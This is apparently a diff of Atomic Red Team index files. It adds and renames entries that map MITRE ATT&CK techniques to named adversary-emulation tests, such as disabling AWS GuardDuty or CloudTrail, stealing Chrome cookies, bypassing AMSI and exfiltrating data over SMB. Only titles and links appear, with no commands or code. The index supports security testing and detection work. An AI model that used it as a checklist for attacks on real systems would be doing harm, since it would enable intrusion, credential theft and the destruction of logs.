 impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
 impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
+impact,T1490,Inhibit System Recovery,10,Windows - vssadmin Resize Shadowstorage Volume,da558b07-69ae-41b9-b9d4-4d98154a7049,powershell
 impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
 impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
 impact,T1529,System Shutdown/Reboot,10,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
@@ -61,7 +61,8 @@
 - T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

 # persistence
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1098.003 Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md)
+  - Atomic Test #1: Azure AD - Add Company Administrator Role to a user [azure-ad]
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -66,7 +66,7 @@
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]

 # persistence
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.003 Account Manipulation: Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1136.003 Create Account: Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -74,7 +74,7 @@
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -11,21 +11,26 @@
 - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.001 Impair Defenses: Disable or Modify Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
+  - Atomic Test #45: AWS - GuardDuty Suspension or Deletion [iaas:aws]
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.008 Impair Defenses: Disable Cloud Logs](../../T1562.008/T1562.008.md)
  - Atomic Test #1: AWS - CloudTrail Changes [iaas:aws]
  - Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
+  - Atomic Test #4: AWS - Disable CloudTrail Logging Through Event Selectors using Stratus [linux, macos, iaas:aws]
+  - Atomic Test #6: AWS - Remove VPC Flow Logs using Stratus [linux, macos, iaas:aws]
  - Atomic Test #7: AWS - CloudWatch Log Group Deletes [iaas:aws]
  - Atomic Test #8: AWS CloudWatch Log Stream Deletes [iaas:aws]
+  - Atomic Test #10: GCP - Delete Activity Event Log [iaas:gcp]
 - T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
+  - Atomic Test #3: GCP - Create Custom IAM Role [iaas:gcp]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

 # credential-access
@@ -35,7 +40,8 @@
 - T1522 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1552 Unsecured Credentials](../../T1552/T1552.md)
+  - Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos, iaas:aws]
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1110.003 Brute Force: Password Spraying](../../T1110.003/T1110.003.md)
  - Atomic Test #9: AWS - Password Spray an AWS using GoAWSConsoleSpray [iaas:aws]
@@ -60,7 +66,8 @@
 - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1485 Data Destruction [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1485 Data Destruction](../../T1485/T1485.md)
+  - Atomic Test #4: GCP - Delete Bucket [iaas:gcp]
 - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

@@ -69,11 +76,12 @@
 - T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1082 System Information Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1580 Cloud Infrastructure Discovery](../../T1580/T1580.md)
+  - Atomic Test #1: AWS - EC2 Enumeration from Cloud Instance [linux, macos, iaas:aws]
 - T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1049 System Network Connections Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md)
-  - Atomic Test #1: AWS S3 Enumeration [iaas:azure]
+  - Atomic Test #1: AWS S3 Enumeration [iaas:aws]
 - T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1201 Password Policy Discovery](../../T1201/T1201.md)
  - Atomic Test #11: Examine AWS Password Policy [iaas:aws]
@@ -86,7 +94,7 @@
 - T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

 # persistence
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.003 Account Manipulation: Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1525 Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -100,6 +108,7 @@
  - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
  - Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
  - Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
+  - Atomic Test #17: GCP - Delete Service Account Key [iaas:gcp]
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -107,6 +116,7 @@
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
+  - Atomic Test #3: GCP - Create Custom IAM Role [iaas:gcp]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

 # collection
@@ -127,6 +137,7 @@
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
+  - Atomic Test #3: GCP - Create Custom IAM Role [iaas:gcp]

 # lateral-movement
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -149,6 +160,7 @@
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
+  - Atomic Test #3: GCP - Create Custom IAM Role [iaas:gcp]

 # exfiltration
 - T1020.001 Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -100,10 +100,12 @@
  - Atomic Test #2: Create a Hidden User Called "$" [windows]
  - Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
  - Atomic Test #4: Create and Hide a Service with sc.exe [windows]
+  - Atomic Test #5: Command Execution with NirCmd [windows]
 - [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
  - Atomic Test #1: Add Federation to Azure AD [azure-ad]
 - T1527 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.009 Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1562.009 Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md)
+  - Atomic Test #1: Safe Mode Boot [windows]
 - T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
  - Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
@@ -225,6 +227,7 @@
  - Atomic Test #10: Lolbin Gpscript logon option [windows]
  - Atomic Test #11: Lolbin Gpscript startup option [windows]
  - Atomic Test #12: Lolbas ie4uinit.exe use as proxy [windows]
+  - Atomic Test #13: LOLBAS CustomShellHost to Spawn Process [windows]
 - T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
  - Atomic Test #1: Set a file's access timestamp [linux, macos]
@@ -342,6 +345,7 @@
  - Atomic Test #54: Do Not Connect To Win Update [windows]
  - Atomic Test #55: Tamper Win Defender Protection [windows]
  - Atomic Test #56: Snake Malware Registry Blob [windows]
+  - Atomic Test #57: Allow Simultaneous Download Registry [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
  - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -536,6 +540,8 @@
  - Atomic Test #41: Clear Pagging Cache [linux]
  - Atomic Test #42: Disable Memory Swap [linux]
  - Atomic Test #43: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
+  - Atomic Test #44: AMSI Bypass - Override AMSI via COM [windows]
+  - Atomic Test #45: AWS - GuardDuty Suspension or Deletion [iaas:aws]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -621,12 +627,13 @@
  - Atomic Test #1: AWS - CloudTrail Changes [iaas:aws]
  - Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
  - Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365]
-  - Atomic Test #4: AWS - Disable CloudTrail Logging Through Event Selectors using Stratus [linux, macos]
+  - Atomic Test #4: AWS - Disable CloudTrail Logging Through Event Selectors using Stratus [linux, macos, iaas:aws]
  - Atomic Test #5: AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus [linux, macos]
-  - Atomic Test #6: AWS - Remove VPC Flow Logs using Stratus [linux, macos]
+  - Atomic Test #6: AWS - Remove VPC Flow Logs using Stratus [linux, macos, iaas:aws]
  - Atomic Test #7: AWS - CloudWatch Log Group Deletes [iaas:aws]
  - Atomic Test #8: AWS CloudWatch Log Stream Deletes [iaas:aws]
  - Atomic Test #9: Office 365 - Set Audit Bypass For a Mailbox [office-365]
+  - Atomic Test #10: GCP - Delete Activity Event Log [iaas:gcp]
 - [T1564.003 Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md)
  - Atomic Test #1: Hidden Window [windows]
 - T1147 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -701,6 +708,7 @@
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
+  - Atomic Test #3: GCP - Create Custom IAM Role [iaas:gcp]
 - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.004 Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md)
  - Atomic Test #1: Alternate Data Streams (ADS) [windows]
@@ -818,7 +826,8 @@
  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
  - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
 - T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.012 Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md)
+  - Atomic Test #1: Print Processors [windows]
 - [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
  - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
 - T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -848,7 +857,8 @@
  - Atomic Test #2: Create shortcut to cmd in startup folders [windows]
 - T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
-  - Atomic Test #1: Modify SSP configuration in registry [windows]
+  - Atomic Test #1: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry [windows]
+  - Atomic Test #2: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry [windows]
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
  - Atomic Test #1: Launch Daemon [macos]
@@ -1044,6 +1054,7 @@
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
+  - Atomic Test #3: GCP - Create Custom IAM Role [iaas:gcp]
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
  - Atomic Test #1: At.exe Scheduled task [windows]
  - Atomic Test #2: At - Schedule a job [linux]
@@ -1306,8 +1317,10 @@
 - T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1137 Office Application Startup](../../T1137/T1137.md)
  - Atomic Test #1: Office Application Startup - Outlook as a C2 [windows]
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1098.003 Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md)
+  - Atomic Test #1: Azure AD - Add Company Administrator Role to a user [azure-ad]
+- [T1547.012 Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md)
+  - Atomic Test #1: Print Processors [windows]
 - [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
  - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
 - T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1351,7 +1364,8 @@
 - T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1525 Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
-  - Atomic Test #1: Modify SSP configuration in registry [windows]
+  - Atomic Test #1: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry [windows]
+  - Atomic Test #2: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry [windows]
 - T1004 Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1131 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1418,6 +1432,8 @@
  - Atomic Test #1: Create a new Windows domain admin user [windows]
  - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
  - Atomic Test #3: Create a new Domain Account using PowerShell [windows]
+  - Atomic Test #4: Active Directory Create Admin Account [linux]
+  - Atomic Test #5: Active Directory Create User Account (Non-elevated) [linux]
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1138 Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1488,6 +1504,7 @@
  - Atomic Test #14: Domain Password Policy Check: No Lowercase Character in Password [windows]
  - Atomic Test #15: Domain Password Policy Check: Only Two Character Classes [windows]
  - Atomic Test #16: Domain Password Policy Check: Common Password Use [windows]
+  - Atomic Test #17: GCP - Delete Service Account Key [iaas:gcp]
 - [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
  - Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
  - Atomic Test #2: MacOS - Load Kernel Module via kextload and kmutil [macos]
@@ -1576,7 +1593,8 @@
 - [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
  - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
  - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1098.002 Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md)
+  - Atomic Test #1: EXO - Full access mailbox permission granted to a user [office-365]
 - T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md)
@@ -1588,6 +1606,7 @@
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
+  - Atomic Test #3: GCP - Create Custom IAM Role [iaas:gcp]
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
  - Atomic Test #1: At.exe Scheduled task [windows]
  - Atomic Test #2: At - Schedule a job [linux]
@@ -1648,6 +1667,7 @@
  - Atomic Test #1: DNS over HTTPS Large Query Volume [windows]
  - Atomic Test #2: DNS over HTTPS Regular Beaconing [windows]
  - Atomic Test #3: DNS over HTTPS Long Domain Query [windows]
+  - Atomic Test #4: run ngrok [windows]
 - T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1858,7 +1878,9 @@
 - T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1097 Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1570 Lateral Tool Transfer](../../T1570/T1570.md)
+  - Atomic Test #1: Exfiltration Over SMB over QUIC (New-SmbMapping) [windows]
+  - Atomic Test #2: Exfiltration Over SMB over QUIC (NET USE) [windows]
 - T1184 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1075 Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1908,6 +1930,7 @@
 - [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
  - Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
  - Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
+  - Atomic Test #3: Steal Chrome Cookies via Remote Debugging (Mac) [macos]
 - [T1003.002 OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md)
  - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
  - Atomic Test #2: Registry parse with pypykatz [windows]
@@ -1969,7 +1992,7 @@
  - Atomic Test #7: WinPwn - Loot local Credentials - Wifi Credentials [windows]
  - Atomic Test #8: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords [windows]
 - [T1552 Unsecured Credentials](../../T1552/T1552.md)
-  - Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos]
+  - Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos, iaas:aws]
 - T1139 Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2168,6 +2191,7 @@
  - Atomic Test #20: Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope [windows]
  - Atomic Test #21: Suspicious LAPS Attributes Query with adfind all properties [windows]
  - Atomic Test #22: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd [windows]
+  - Atomic Test #23: Active Directory Domain Search [linux]
 - T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
  - Atomic Test #1: Enumerate all accounts (Local) [linux]
@@ -2200,6 +2224,7 @@
  - Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
  - Atomic Test #13: Get-DomainGroup with PowerView [windows]
  - Atomic Test #14: Active Directory Enumeration with LDIFDE [windows]
+  - Atomic Test #15: Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS [linux]
 - [T1007 System Service Discovery](../../T1007/T1007.md)
  - Atomic Test #1: System Service Discovery [windows]
  - Atomic Test #2: System Service Discovery - net.exe [windows]
@@ -2256,12 +2281,13 @@
  - Atomic Test #23: Azure Security Scan with SkyArk [azure-ad]
  - Atomic Test #24: Linux List Kernel Modules [linux]
  - Atomic Test #25: System Information Discovery with WMIC [windows]
+  - Atomic Test #26: Driver Enumeration using DriverQuery [windows]
 - [T1010 Application Window Discovery](../../T1010/T1010.md)
  - Atomic Test #1: List Process Main Windows - C# .NET [windows]
 - T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1580 Cloud Infrastructure Discovery](../../T1580/T1580.md)
-  - Atomic Test #1: AWS - EC2 Enumeration from Cloud Instance [linux, macos]
+  - Atomic Test #1: AWS - EC2 Enumeration from Cloud Instance [linux, macos, iaas:aws]
 - [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
  - Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux]
  - Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
@@ -2305,7 +2331,7 @@
  - Atomic Test #4: System Discovery using SharpView [windows]
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md)
-  - Atomic Test #1: AWS S3 Enumeration [iaas:azure]
+  - Atomic Test #1: AWS S3 Enumeration [iaas:aws]
